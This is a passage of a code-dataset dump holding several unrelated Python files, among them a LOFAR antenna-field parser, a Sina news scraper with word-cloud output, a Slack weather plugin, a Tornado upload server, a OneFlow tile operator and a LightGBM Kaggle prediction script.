AntFldData={'LBA': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[],'REL_POS':[]},\n                'HBA': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[],'REL_POS':[]},\n                'HBA0': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[]},\n                'HBA1': {'NORMAL_VECTOR': [], 'ROTATION_MATRIX':[],'POSITION':[]}\n                }\n    \n    try:\n        f = open(filename)\n    except IOError:\n        print(\"Error: \"+filename+\" does not exist.\")\n        raise\n    line = f.readline()\n    while line:\n        if COMMENT_CHAR in line:\n            line, comment = line.split(COMMENT_CHAR, 1)\n        if \"HBA0\" in line:\n            AntBand = \"HBA0\"\n        elif \"HBA1\" in line:\n            AntBand = \"HBA1\"\n        elif \"HBA\" in line:\n            AntBand = \"HBA\"\n        elif \"LBA\" in line:\n            AntBand = \"LBA\"\n        else:\n            line=f.readline()\n            continue\n        where, rest = line.split(AntBand, 1)\n        where = where.strip()\n        if where == '':\n            # Read absolute position of station origin\n            line = f.readline()\n            elementposshape, elementposLine = line.split(' ',1)\n            elementposLine = elementposLine.strip('[] \\n').split()\n            position = [float(v) for v in elementposLine]\n            AntFldData[AntBand]['POSITION'] = position\n            if AntBand != \"HBA0\" and AntBand != \"HBA1\":\n                # Read relative position of each element\n                line = f.readline()\n                dimstr,rest = line.split('[',1)\n                shp = dimstr.split('x')\n                if shp[0][0] == '(':\n                    (idxbeg,idxend) = shp[0].strip('() ').split(',')\n                    nrrows = int(idxend)+1\n                else:\n                    nrrows = int(shp[0])\n                for elementNr in range(0,nrrows):\n                    line = f.readline()\n                    vals = line.split()\n                    posxpol = [float(v) for v in vals[0:3]]\n                    posypol = 
[float(v) for v in vals[3:6]]\n AntFldData[AntBand]['REL_POS'].append(posxpol) \n # Note: Skip ypol as it is identical to xpol\n # Read ending ']' line\n line=f.readline()\n elif where == 'NORMAL_VECTOR':\n line = f.readline()\n elementposshape, elementposLine = line.split(' ',1)\n elementposLine = elementposLine.strip('[] \\n').split()\n nrmv = [float(v) for v in elementposLine]\n AntFldData[AntBand][where]=nrmv\n elif where == 'ROTATION_MATRIX':\n line = f.readline()\n elementposshape, elementposLine = line.split(' ',1)\n elementposLine = elementposLine.strip('[] \\n').split()\n elementposLine = line.split()\n dimstr, rest = line.split('[',1)\n shp = dimstr.split('x')\n for xyz in range(3):\n line = f.readline()\n rowstr = line.split()\n row = [float(v) for v in rowstr]\n AntFldData[AntBand][where].append(row)\n # Read ending ']' line\n line = f.readline()\n line = f.readline()\n return AntFldData\n\n\ndef parseiHBADeltasfile(stationName):\n \"\"\"Parse iHBADelta file.\"\"\"\n iHBADeltasdata = []\n filepath = _getiHBADeltafile(stationName)\n f = open(filepath)\n line=f.readline()\n while line:\n if COMMENT_CHAR in line:\n line, comment = line.split(COMMENT_CHAR, 1)\n if \"HBADeltas\" in line:\n HBADeltaLine = True\n break\n else:\n line=f.readline()\n continue\n if HBADeltaLine:\n line = f.readline()\n nrelems, nrdims = line.strip().rstrip('[').split('x')\n if nrelems[0] == '(':\n nrelems = int(nrelems.strip('() ').split(',')[1])+1\n nrdims = int(nrdims.strip('() ').split(',')[1])+1\n else:\n nrelems, nrdims = int(nrelems), int(nrdims)\n for elemnr in range(nrelems):\n line = f.readline()\n xpos, ypos, zpos = line.lstrip().split()\n iHBADeltasdata.append([float(xpos), float(ypos), float(zpos)])\n #elempos[elemnr,0], elempos[elemnr,1], elempos[elemnr,2] =\\\n # float(xpos), float(ypos), float(zpos)\n else:\n raise RuntimeError(\"Error: iHBADeltas file is corrupt.\")\n return iHBADeltasdata\n\n\ndef getHBAsepton(stnName, HBAsingleelems):\n \"\"\"Get configuration parameters for an HBA station in SEPTON mode. SEPTON\n stands for single element per tile ON. In this mode the HBA can be seen as\n an instantenously omni-directional interferometer capable of producing\n allsky snapshots.\n \"\"\"\n stnPos, stnRot, stnRelPos, stnIntilePos = getArrayBandParams(stnName, 'HBA')\n nrtiles = len(HBAsingleelems)\n relpospertile = np.zeros((nrtiles,3))\n for tilenr in range(nrtiles):\n relpospertile[tilenr] = stnIntilePos[HBAsingleelems[tilenr]]\n stnRelPos += relpospertile\n return stnPos, stnRot, stnRelPos\n\n\ndef getArrayBandParams(stnid, arrband):\n \"\"\"Get configuration parameters for an array band of the station.\n Array band can be HBA or LBA.\n \n Note: Core stations (CS) antenna field files specify rotation and normal\n vector for HBA0 & HBA1 subarrays while their relative positions\n are given specified as HBA.\n Note: Normal vector can be obtain from last column in rotation matrix.\n \"\"\"\n antfld = parseAntennaField(stnid)\n stnLoc = stnid[0:2]\n errmess = \"Array band not valid. 
Only 'LBA', 'HBA' are valid, \"\\\n + \"except for 'CS' stations for which 'HBA0', 'HBA1' are also valid.\"\n if arrband == 'LBA':\n subarr = 'LBA'\n hbadeltas = [0.,0.,0.]\n elif arrband.startswith('HBA'):\n # Set subarr appropriately\n if stnLoc == 'CS':\n if arrband == 'HBA0' or arrband == 'HBA1':\n subarr = arrband\n elif arrband == 'HBA':\n # Arbitrarily choose HBA0 (HBA1 could also be used)\n subarr = 'HBA0' \n elif arrband == 'HBA':\n subarr = arrband\n else:\n raise ValueError(errmess)\n arrband = 'HBA'\n hbadeltas = parseiHBADeltasfile(stnid)\n else:\n raise ValueError(errmess)\n # Use matrices in order to facilitate coord transformation.\n # axis=0\n stnpos = np.matrix(antfld[arrband]['POSITION']).T\n stnrot = np.matrix(antfld[subarr]['ROTATION_MATRIX'])\n stnrelpos = np.matrix(antfld[arrband]['REL_POS'])\n stnintilepos = np.matrix(hbadeltas)\n return stnpos, stnrot, stnrelpos, stnintilepos\n\n\ndef printantennafieldfile():\n parser = argparse.ArgumentParser()\n #parser.add_argument(\"antenna_field_file\")\n parser.add_argument(\"stnid\")\n args = parser.parse_args()\n AFD = parseAntennaField(args.stnid)\n print(AFD)\n\n\ndef list_stations(antenna_field_dir=ANTENNAFIELDDIR):\n \"\"\"List all the available LOFAR station-ids.\n \"\"\"\n dirlist = os.listdir(antenna_field_dir)\n stnId_list = []\n for f in dirlist:\n splitres = f.split(\"-AntennaField.conf\")\n if len(splitres) == 2 and splitres[1] == '':\n stnId = splitres[0]\n stnId_list.append(stnId)\n return stnId_list\n\n\ndef main():\n stnId_list = list_stations()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"stnid\", help='Choose a station: {}'.format(','.join(stnId_list)))\n parser.add_argument(\"bandarr\", help='Choose HBA or LBA')\n args = parser.parse_args()\n stnpos, stnrot, stnrelpos, stnintilepos = \\\n getArrayBandParams(args.stnid, args.bandarr)\n print(\"Position:\\n{}\".format(stnpos))\n print(\"Rotation:\\n{}\".format(stnrot))\n print(\"Relative positions:\\n{}\".format(stnrelpos))\n print(\"In-tile positions:\\n{}\".format(stnintilepos))\n\n\nif __name__ == '__main__':\n #main()\n printantennafieldfile()\n\n","sub_path":"ilisa/antennameta/antennafieldlib.py","file_name":"antennafieldlib.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"540690496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nBasic idea of the program:\n 1. Grab a few webpages from sina and extract the news subjects\n 2. Segment words using Python the package jieba\n 2.1 Filter out the stop words\n 2.2 Only keep nouns\n 3. Load all the words(with some appearing multiple times) into the package wordcloud\n 4. 
That's it!\n\n@author: Dazhuang\n\n\nRan into problems installing Wordcloud; downloading the whl directly from the link below and installing it solved the issue:\nhttps://www.lfd.uci.edu/~gohlke/pythonlibs/#wordcloud \nMind the working directory when running, because stopwords.txt has to be loaded.\n\t \n\"\"\"\nimport jieba\nimport jieba.posseg as pseg\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom os import path\nimport pandas as pd\nimport re\nimport requests\nfrom scipy.misc import imread\nimport scipy\nimport time\nfrom wordcloud import WordCloud\nimport random\n\ndef fetch_sina_news():\n    '''\n    Download Sina news from the list pages; MAX_PAGE_NUM is the maximum number of pages.\n    Extract all news titles with a regex and write them to the file subjects.txt.\n    '''\n    PATTERN = re.compile('.shtml\" target=\"_blank\">(.*?)(.*)')\n    BASE_URL = \"http://roll.news.sina.com.cn/news/gnxw/gdxw1/index_\"\n    #BASE_URL = 'http://roll.news.sina.com.cn/news/gjxw/gjmtjj/index_'   # international news\n    #BASE_URL = 'http://roll.news.sina.com.cn/news/shxw/zqsk/index_'  # society news\n    MAX_PAGE_NUM = 16\n\n    with open('subjects.txt','w',encoding='utf-8') as f:  # open via with so the file is closed at the end\n        for i in range(1, MAX_PAGE_NUM):  # loop from 1 to the maximum page number\n            print('Downloading page #{}'.format(i))\n            r = requests.get(BASE_URL + str(i)+'.shtml')  # requests.get fetches the page data\n            r.encoding='gb2312'  # r is the response\n            data = r.text  # r.text is the plain-text body\n            p = re.findall(PATTERN, data)  # use the regex to get a list\n            for s in p:\n                f.write(s[0])  # write the article title to the file\n            time.sleep(random.randint(5,10))  # sleep 5-10 seconds to avoid being flagged by the firewall\n    \ndef extract_words():\n    \n    with open('subjects.txt','r',encoding='utf-8') as f:  # open the title list file\n        news_subjects = f.readlines()  # no newlines were written, so there is only one line\n    \n    stop_words = set(line.strip() for line in open('stopwords.txt', encoding='utf-8'))\n    # build the stop-word list; the set removes duplicates\n    newslist = []  # newslist holds the words left after stop-word removal\n    \n    for subject in news_subjects:\n        if subject.isspace():\n            continue\n        \n        # segment words line by line\n        word_list = pseg.cut(subject)  # (important) segment the text with jieba; word_list is a generator\n        for word, flag in word_list:  # each item is a jieba.posseg.pair, e.g. pair('word', 'nr'): the word first, then its part of speech\n            if not word in stop_words and flag == 'n':  # skip stop words, keep nouns only\n                newslist.append(word)  # build the new vocabulary (stop words removed)\n    \n    d = path.dirname(__file__)  \n    mask_image = imread(path.join(d, \"mickey.png\"))  # mask_image is a numpy.ndarray\n\n    content = ' '.join(newslist)  # join the word list with spaces\n    wordcloud = WordCloud(font_path='simhei.ttf', background_color=\"grey\", mask=mask_image, max_words=40).generate(content)\n    # word cloud reference: http://blog.csdn.net/fontthrone/article/details/72775865\n    \n    # Display the generated image:\n    plt.imshow(wordcloud)\n    plt.axis(\"off\")  # hide the axes\n    wordcloud.to_file('wordcloud.jpg')\n    plt.show()\n    \nif __name__ == \"__main__\":\n    fetch_sina_news()\n    extract_words()\n","sub_path":"Data Processing/4.2/sinanews/news_title_mining.py","file_name":"news_title_mining.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"220706809","text":"# Imported Python Transfer Function\n#\nimport sensor_msgs.msg\nimport hbp_nrp_cle.tf_framework.tf_lib\n@nrp.MapRobotSubscriber(\"camera_left\", Topic('/mouse/mouse_left_eye/mouse/left_eye', sensor_msgs.msg.Image))\n@nrp.MapRobotSubscriber(\"camera_right\", Topic('/mouse/mouse_right_eye/mouse/right_eye', sensor_msgs.msg.Image))\n@nrp.MapSpikeSource(\"red_left_eye\", nrp.brain.sensors[0], nrp.poisson)\n@nrp.MapSpikeSource(\"red_right_eye\", nrp.brain.sensors[1], nrp.poisson)\n@nrp.Robot2Neuron()\ndef eye_sensor_transmit_right(t, camera_right, camera_left, red_left_eye, red_right_eye):\n    image_results_left = hbp_nrp_cle.tf_framework.tf_lib.detect_red(image=camera_left.value)\n    image_results_right = 
hbp_nrp_cle.tf_framework.tf_lib.detect_red(image=camera_right.value)\n    red_right_eye.rate = 500.0 * (image_results_left.right+image_results_right.right)\n    red_left_eye.rate = 500.0 * (image_results_left.left+image_results_right.left)\n#\n\n","sub_path":"braitenberg_mouse_lab/eye_sensor_transmit_right.py","file_name":"eye_sensor_transmit_right.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"618558575","text":"#-*- coding: utf-8 -*-\nimport os\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nfrom datetime import datetime\nimport itertools\n\n# be sure to share the doc with your Google APIs address\nDOC_URL = 'https://docs.google.com/spreadsheets/d/1yXpEm40A_Gvg-qpHQGP-3lj0I9ZbNI-NqCcHVOMC1OM/edit#gid=0'\n# downloaded from Google Developers Console\nGOOGLE_AUTH = 'google_auth.json'\n\nif __name__ == '__main__':\n    scope = ['https://spreadsheets.google.com/feeds']\n    credentials = ServiceAccountCredentials.from_json_keyfile_name(GOOGLE_AUTH, scope)\n    gc = gspread.authorize(credentials)\n    sh = gc.open_by_url(DOC_URL)\n\n    wks = sh.get_worksheet(len(sh.worksheets()) - 1)\n    most_recent_values = None\n    if wks is not None:\n        most_recent_values = sorted(wks.col_values(1))\n\n    path = os.path.expanduser('~/Music/iTunes/iTunes Media/Music/Unknown Artist/Unknown Album')\n    current = sorted(map(lambda x: ([x.decode('utf8')[:-4]]), os.listdir(path)))\n\n    if list(itertools.chain(*current)) != most_recent_values:\n        date_string = datetime.now().strftime('%d %B, %Y')\n        if date_string == wks.title:\n            sh.del_worksheet(wks)\n        wks = sh.add_worksheet(title=date_string, rows='1', cols='1')\n        map(lambda x: wks.insert_row(x), current)\n\n","sub_path":"pub_music.py","file_name":"pub_music.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"121805937","text":"from __future__ import unicode_literals\n\nfrom django.db.backends.postgresql_psycopg2.operations import DatabaseOperations as BaseDatabaseOperations\n\n\nclass DatabaseOperations(BaseDatabaseOperations):\n    def last_insert_id(self, cursor, table_name, pk_name):\n        # Redshift has no sequence support, so read back the current maximum\n        # value of the primary-key column instead (not safe under concurrent inserts)\n        cursor.execute(\"SELECT MAX(%s) FROM %s\" % (\n            pk_name, self.quote_name(table_name)))\n        return cursor.fetchone()[0]\n","sub_path":"django-redshift/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"49287231","text":"# -*- coding: utf-8 -*-\n\"\"\"!weather returns the 5-day forecast\"\"\"\n\ntry:\n    from urllib import quote\nexcept ImportError:\n    from urllib.request import quote\nimport json\nimport logging\nimport os\nimport re\nimport time\n\nimport requests\n\n# https://developer.yahoo.com/weather/documentation.html\nICONMAP = {\n    \"0\": \":tornado:\",\n    \"1\": \":cyclone:\",\n    \"2\": \":cyclone:\",\n    \"3\": \":thunder_cloud_and_rain:\",\n    \"4\": \":thunder_cloud_and_rain:\",\n    \"5\": \":snowflake:\",\n    \"6\": \":snowflake:\",\n    \"7\": \":snowflake:\",\n    \"8\": \":snowflake:\",\n    \"9\": \":rain_cloud:\",\n    \"10\": \":snowflake:\",\n    \"11\": \":rain_cloud:\",\n    \"12\": \":rain_cloud:\",\n    \"13\": \":snowflake:\",\n    \"14\": \":snowflake:\",\n    \"15\": \":snowflake:\",\n    \"16\": \":snowflake:\",\n    \"17\": 
\":thunder_cloud_and_rain:\",\n \"18\": \":rain_cloud:\",\n \"19\": \":desert:\",\n \"20\": \":cloud:\",\n \"21\": \":cloud:\",\n \"22\": \":smoking:\",\n \"23\": \":wind_blowing_face:\",\n \"24\": \":wind_blowing_face:\",\n \"25\": \":snowman_without_snow:\",\n \"26\": \":cloud:\",\n \"27\": \":sun_behind_cloud:\",\n \"28\": \":sun_behind_cloud:\",\n \"29\": \":sun_small_cloud:\",\n \"30\": \":sun_small_cloud:\",\n \"32\": \":sunny:\",\n \"33\": \":sunny:\",\n \"34\": \":sunny:\",\n \"35\": \":thunder_cloud_and_rain:\",\n \"36\": \":sunny:\",\n \"37\": \":thunder_cloud_and_rain:\",\n \"38\": \":thunder_cloud_and_rain:\",\n \"39\": \":thunder_cloud_and_rain:\",\n \"40\": \":rain_cloud:\",\n \"41\": \":snowflake:\",\n \"42\": \":snowflake:\",\n \"43\": \":snowflake:\",\n \"44\": \":partly_sunny:\",\n \"45\": \":thunder_cloud_and_rain:\",\n \"46\": \":snowflake:\",\n \"47\": \":thunder_cloud_and_rain:\",\n}\n\nclass WeatherException(Exception):\n \"\"\"An exception finding the weather\"\"\"\n pass\n\ndef weather(searchterm):\n \"\"\"Get the weather for a place given by searchterm\n\n Returns a title and a list of forecasts.\n\n The title describes the location for the forecast (i.e. \"Portland, ME USA\")\n The list of forecasts is a list of dictionaries in slack attachment fields\n format (see https://api.slack.com/docs/message-attachments)\n\n Throws WeatherException if the location given by `searchterm` can't be\n found.\n \"\"\"\n yql = u'select * from weather.forecast where woeid in '\\\n '(select woeid from geo.places(1) where text=\"{}\")'.format(\n searchterm)\n\n unit = \"c\" if os.environ.get(\"WEATHER_CELSIUS\") else \"f\"\n if unit == \"c\":\n yql += u' AND u=\"c\"'\n\n url = 'https://query.yahooapis.com/v1/public/yql?'\\\n 'q={}&format=json'.format(quote(yql.encode('utf8')))\n\n dat = requests.get(url).json()\n if 'query' not in dat or not dat['query']['results']:\n logging.warning('weather response missing fields. 
response: %s', dat)\n        raise WeatherException(\":crying_cat_face: Sorry, weather request failed\"\n                               \":crying_cat_face:\")\n\n    forecast = dat['query']['results']['channel']['item']['forecast']\n    location = dat['query']['results']['channel']['location']\n\n    region = location['region'].strip()\n    if region == location[\"city\"].strip():\n        region = \"\"\n    else:\n        region = \"{} \".format(region)\n\n    title = \"Weather for {}, {}{}: \".format(\n        location[\"city\"], region, location['country'])\n\n    forecasts = []\n    for day in forecast:\n        day_of_wk = time.strftime(\"%A\", time.strptime(day[\"date\"], \"%d %b %Y\"))\n        icon = ICONMAP.get(day[\"code\"], \":question:\")\n        forecasts.append({\n            \"title\": day_of_wk,\n            \"value\": u\"{} {}°{}\".format(icon, day[\"high\"], unit),\n            \"short\": True,\n        })\n\n    return title, forecasts\n\ndef on_message(msg, server):\n    text = msg.get(\"text\", \"\")\n    match = re.findall(r\"!weather (.*)\", text)\n    if not match:\n        return\n\n    try:\n        title, forecasts = weather(match[0])\n    except WeatherException as err:\n        return err.args[0]\n\n    attachment = {\n        \"fallback\": title,\n        \"pretext\": title,\n        \"fields\": forecasts[0:4]\n    }\n    server.slack.post_message(\n        msg['channel'],\n        '',\n        as_user=server.slack.username,\n        attachments=json.dumps([attachment]))\n\non_bot_message = on_message\n","sub_path":"limbo/plugins/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"590742441","text":"import os\r\nimport math\r\n\r\ndef main():\r\n    theRange = int(input())\r\n    if theRange < 3 or theRange%2!=1:\r\n        print(\"Range must be bigger than 2 and must be odd\")\r\n        stop()\r\n    startingPoint = int(input())\r\n    if(startingPoint > 4 or startingPoint < 0):\r\n        print(\"startingPoint must be less than 5 and bigger than -1\")\r\n        stop()\r\n    arr = [[] for i in range(theRange)]\r\n    for x in arr:\r\n        row = input()\r\n        x.extend(list(row))\r\n        if len(x) != theRange:\r\n            print(\"must be {0} numbers\".format(theRange))\r\n            stop()\r\n    record = \"\"\r\n    x = len(arr)//2\r\n    y = len(arr[x])//2\r\n    z = 1\r\n    record += arr[x][y]\r\n    direction = 4 #4=>left 8=>top 6=>right 2=>down\r\n    if startingPoint == 0:\r\n        direction = 4\r\n    elif startingPoint == 1:\r\n        direction = 8\r\n    elif startingPoint == 2:\r\n        direction = 6\r\n    elif startingPoint == 3:\r\n        direction = 2\r\n\r\n    while 1:\r\n        for j in range(2):\r\n            for k in range(z):\r\n                try:\r\n                    if direction==4:\r\n                        y = y-1\r\n                    elif direction==8:\r\n                        x = x-1\r\n                    elif direction==6:\r\n                        y = y+1\r\n                    elif direction==2:\r\n                        x = x+1\r\n                    if(x<0 or y<0):\r\n                        raise IndexError()\r\n                    record += arr[x][y]\r\n                except IndexError:\r\n                    print(record)\r\n                    stop()\r\n            \r\n            if direction==4:\r\n                direction = 8\r\n            elif direction==8:\r\n                direction = 6\r\n            elif direction==6:\r\n                direction = 2\r\n            elif direction==2:\r\n                direction = 4\r\n        z = z+1\r\n        \r\n    print(record)\r\n    \r\ndef stop():\r\n    os.system(\"pause\")\r\n    exit()\r\n    \r\nmain()\r\n","sub_path":"programming language/homework2.py","file_name":"homework2.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"430123603","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. 
All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom typing import Union\n\nimport oneflow as flow\nfrom oneflow.framework.tensor import register_tensor_op\n\n\n@register_tensor_op(\"tile\")\ndef tile_op(input, reps):\n \"\"\"The interface is consistent with PyTorch.\n The documentation is referenced from:\n https://pytorch.org/docs/stable/generated/torch.tile.html\n\n Constructs a tensor by repeating the elements of ``input``. The ``reps`` argument specifies the number\n of repetitions in each dimension.\n\n If ``reps`` specifies fewer dimensions than ``input`` has, then ones are prepended to ``reps`` until\n all dimensions are specified. For example, if ``input`` has shape (8, 6, 4, 2) and ``reps`` is (2, 2),\n then ``reps`` is treated as (1, 1, 2, 2).\n\n Analogously, if ``input`` has fewer dimensions than ``reps`` specifies, then ``input`` is treated as\n if it were unsqueezed at dimension zero until it has as many dimensions as ``reps`` specifies.\n For example, if ``input`` has shape (4, 2) and ``reps`` is (3, 3, 2, 2), then ``input`` is treated as\n if it had the shape (1, 1, 4, 2).\n\n .. note::\n This function is similar to NumPy’s tile function.\n\n Args:\n input (oneflow.Tensor): the tensor whose elements to repeat.\n reps (tuple): the number of repetitions per dimension.\n\n For example:\n\n .. 
code-block:: python\n\n >>> import oneflow as flow\n >>> import numpy as np\n \n >>> x = np.array([1, 2]).astype(np.int32)\n >>> input = flow.tensor(x, dtype=flow.int32)\n >>> out = input.tile(reps=(2,))\n >>> out\n tensor([1, 2, 1, 2], dtype=oneflow.int32)\n\n >>> x = np.random.randn(5, 2, 1)\n >>> input = flow.Tensor(x)\n >>> out = input.tile(reps=(3, 4))\n >>> out.size()\n oneflow.Size([5, 6, 4])\n\n \"\"\"\n\n for s in reps:\n assert s > 0\n input_shape = input.shape\n diff = len(input_shape) - len(reps)\n if diff > 0:\n shape = [1 for _ in range(diff)]\n shape.extend([i for i in reps])\n reps = tuple(shape)\n return input.repeat(reps)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(raise_on_error=True)\n","sub_path":"python/oneflow/nn/modules/tile.py","file_name":"tile.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"639121388","text":"import tornado\nimport tornado.ioloop\nimport tornado.web\nimport os\nimport uuid\n\n__UPLOADS__ = \"uploads/\"\n\n\nclass Userform(tornado.web.RequestHandler):\n\n def get(self):\n self.render(\"upload.html\")\n\n\nclass Upload(tornado.web.RequestHandler):\n\n def post(self):\n fileinfo = self.request.files['filearg'][0]\n fname = fileinfo['filename']\n extn = os.path.splitext(fname)[1]\n cname = str(uuid.uuid4()) + extn\n fh = open(__UPLOADS__ + cname, 'wb')\n fh.write(fileinfo['body'])\n link = \"{name}\".format(name=cname)\n self.finish(link)\n\n\napplication = tornado.web.Application([\n (r\"/\", Userform),\n (r\"/upload\", Upload),\n (r\"/uploads/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"uploads\"}),\n], debug=True)\n\n\nif __name__ == \"__main__\":\n application.listen(8000)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"01-tornado-file-upload-2/app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615367991","text":"from userlib import BSTree\n\n\"\"\"\nProblem 33:\nGiven a Binary Tree, find vertical sum of the nodes that are in same vertical line. Print all sums through different vertical lines.\n\nExamples:\n\n 1\n / \\\n 2 3\n / \\ / \\\n4 5 6 7\nThe tree has 5 vertical lines\n\nVertical-Line-1 has only one node 4 => vertical sum is 4\nVertical-Line-2: has only one node 2=> vertical sum is 2\nVertical-Line-3: has three nodes: 1,5,6 => vertical sum is 1+5+6 = 12\nVertical-Line-4: has only one node 3 => vertical sum is 3\nVertical-Line-5: has only one node 7 => vertical sum is 7\n\nSo expected output is 4, 2, 12, 3 and 7\n\nSolution:\nWe need to check the Horizontal Distances from root for all nodes. If two nodes have the same Horizontal Distance (HD), then they are on same vertical line.\nThe idea of HD is simple. 
HD for root is 0, a right edge (edge connecting to right subtree) is considered as +1 horizontal distance and a left edge\nis considered as -1 horizontal distance.\n\nWe hash the HD\n\"\"\"\n\nhash_table = {}\n\n\ndef find_vertical_sum(root, column):\n if root is None:\n return\n if column not in hash_table:\n hash_table[column] = 0\n hash_table[column] += root.get_data()\n find_vertical_sum(root.get_left(), column - 1)\n find_vertical_sum(root.get_right(), column + 1)\n\n return hash_table\n\nif __name__ == '__main__':\n b = [10, 5, 15, 2, 6, 16, 11]\n a = BSTree(*b)\n print(find_vertical_sum(a.root, 0))","sub_path":"karumanchi/Trees/vertical_sum.py","file_name":"vertical_sum.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324447628","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 6 20:58:07 2018\n\n@author: kazuki.onodera\n\nnohup python -u 912_predict_807-1.py 0 > LOG/log_912_predict_807-1_s0.py.txt &\nnohup python -u 912_predict_807-1.py 1 > LOG/log_912_predict_807-1_s1.py.txt &\nnohup python -u 912_predict_807-1.py 2 > LOG/log_912_predict_807-1_s2.py.txt &\nnohup python -u 912_predict_807-1.py 3 > LOG/log_912_predict_807-1_s3.py.txt &\nnohup python -u 912_predict_807-1.py 4 > LOG/log_912_predict_807-1_s4.py.txt &\nnohup python -u 912_predict_807-1.py 5 > LOG/log_912_predict_807-1_s5.py.txt &\nnohup python -u 912_predict_807-1.py 6 > LOG/log_912_predict_807-1_s6.py.txt &\nnohup python -u 912_predict_807-1.py 7 > LOG/log_912_predict_807-1_s7.py.txt &\nnohup python -u 912_predict_807-1.py 8 > LOG/log_912_predict_807-1_s8.py.txt &\nnohup python -u 912_predict_807-1.py 9 > LOG/log_912_predict_807-1_s9.py.txt &\n\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport gc, os\nfrom collections import defaultdict\nimport sys\nsys.path.append(f'/home/{os.environ.get(\"USER\")}/PythonLibrary')\nimport lgbextension as ex\nimport lightgbm as lgb\nfrom multiprocessing import cpu_count\nfrom glob import glob\nimport utils, utils_cat, utils_best\nutils.start(__file__)\n#==============================================================================\nprint(sys.argv)\nSEED = int(sys.argv[1])\n\nLOOP = 20\n\nNROUND = 4500\n\nSUBMIT_FILE_PATH = f'../output/807-1_s{SEED}.csv.gz'\n\nCOMMENT = f'LB804 (seed87 loop100)'\n\nEXE_SUBMIT = False\n\nparam = {\n 'objective': 'binary',\n 'metric': 'auc',\n 'learning_rate': 0.01,\n 'max_depth': 6,\n 'num_leaves': 63,\n 'max_bin': 255,\n \n 'min_child_weight': 10,\n 'min_data_in_leaf': 150,\n 'reg_lambda': 0.5, # L2 regularization term on weights.\n 'reg_alpha': 0.5, # L1 regularization term on weights.\n \n 'colsample_bytree': 0.9,\n 'subsample': 0.9,\n# 'nthread': 32,\n 'nthread': cpu_count(),\n 'bagging_freq': 1,\n 'verbose':-1,\n# 'seed': SEED\n }\n\n\nnp.random.seed(SEED)\n\nloader = utils_best.Loader('LB804')\n\n# =============================================================================\n# load\n# =============================================================================\n\nX_train = loader.train()\ny_train = utils.read_pickles('../data/label').TARGET\n\n\nif X_train.columns.duplicated().sum()>0:\n raise Exception(f'duplicated!: { X_train.columns[X_train.columns.duplicated()] }')\nprint('no dup :) ')\nprint(f'X_train.shape {X_train.shape}')\n\ngc.collect()\n\nCAT = list( set(X_train.columns) & set(loader.category()) )\n\nCOL = X_train.columns.tolist()\n\nX_test = loader.test()[COL]\n\n\n\n# 
=============================================================================\n# training\n# =============================================================================\ndtrain = lgb.Dataset(X_train, y_train, categorical_feature=CAT )\n\nmodels = []\nfor i in range(LOOP):\n    print(f'LOOP: {i}')\n    gc.collect()\n    param.update({'seed':np.random.randint(9999)})\n    model = lgb.train(param, dtrain, NROUND,\n                      categorical_feature=CAT)\n#    model.save_model(f'lgb{i}.model')\n    models.append(model)\n\nimp = ex.getImp(models)\nimp.to_csv(f'LOG/imp_{__file__}.csv', index=False)\n\n# =============================================================================\n# predict\n# =============================================================================\nsub = pd.read_pickle('../data/sub.p')\n\ngc.collect()\n\nlabel_name = 'TARGET'\n\nsub[label_name] = 0\nfor model in models:\n    y_pred = model.predict(X_test)\n    sub[label_name] += pd.Series(y_pred).rank()\nsub[label_name] /= LOOP\nsub[label_name] /= sub[label_name].max()\nsub['SK_ID_CURR'] = sub['SK_ID_CURR'].map(int)\n\nsub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')\n\nprint(sub[label_name].describe())\n\n\n# =============================================================================\n# submission\n# =============================================================================\nif EXE_SUBMIT:\n    print('submit')\n    utils.submit(SUBMIT_FILE_PATH, 